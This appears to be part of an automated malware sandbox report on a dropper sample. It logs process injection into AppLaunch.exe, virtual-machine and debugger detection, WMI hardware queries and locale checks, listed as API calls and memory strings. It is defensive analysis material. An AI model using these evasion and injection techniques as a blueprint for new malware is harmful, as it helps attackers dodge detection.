Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_0040646B FindFirstFileA,FindClose, |
0_2_0040646B |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_004027A1 FindFirstFileA, |
0_2_004027A1 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
0_2_004058BF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00406F00 FindFirstFileA, |
11_2_00406F00 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004364E3 FindFirstFileExW, |
11_2_004364E3 |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWen-USne |
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMware |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Win32_VideoController(Standard display types)VMwareKA8A7T_ZWin32_VideoController84C7EP7MVideoController120060621000000.000000-00063410463display.infMSBDA1D9EZDPZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWGRE8CMV |
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Win32_VideoController(Standard display types)VMwareKA8A7T_ZWin32_VideoController84C7EP7MVideoController120060621000000.000000-00063410463display.infMSBDA1D9EZDPZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWGRE8CMVrInte |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00429634 mov eax, dword ptr fs:[00000030h] |
11_2_00429634 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004326E4 mov eax, dword ptr fs:[00000030h] |
11_2_004326E4 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004326A0 mov eax, dword ptr fs:[00000030h] |
11_2_004326A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00432715 mov eax, dword ptr fs:[00000030h] |
11_2_00432715 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00421C60 mov eax, dword ptr fs:[00000030h] |
11_2_00421C60 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A03A35 mov eax, dword ptr fs:[00000030h] |
21_2_00A03A35 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A0EC04 mov eax, dword ptr fs:[00000030h] |
21_2_00A0EC04 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009F27C0 mov eax, dword ptr fs:[00000030h] |
21_2_009F27C0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00425476 SetUnhandledExceptionFilter, |
11_2_00425476 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00429143 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
11_2_00429143 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004252E3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
11_2_004252E3 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00424E5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
11_2_00424E5C |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009FA8E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
21_2_009FA8E8 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A00430 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
21_2_00A00430 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009FAC0D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
21_2_009FAC0D |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 9C7008 |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 9B4008 |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: EnumSystemLocalesW, |
21_2_00A108E9 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: EnumSystemLocalesW, |
21_2_00A109CF |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: EnumSystemLocalesW, |
21_2_00A10934 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: EnumSystemLocalesW, |
21_2_00A06276 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
21_2_00A10DD3 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
21_2_00A10647 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
21_2_00A10FA8 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: GetLocaleInfoW, |
21_2_00A06798 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
0_2_00403348 |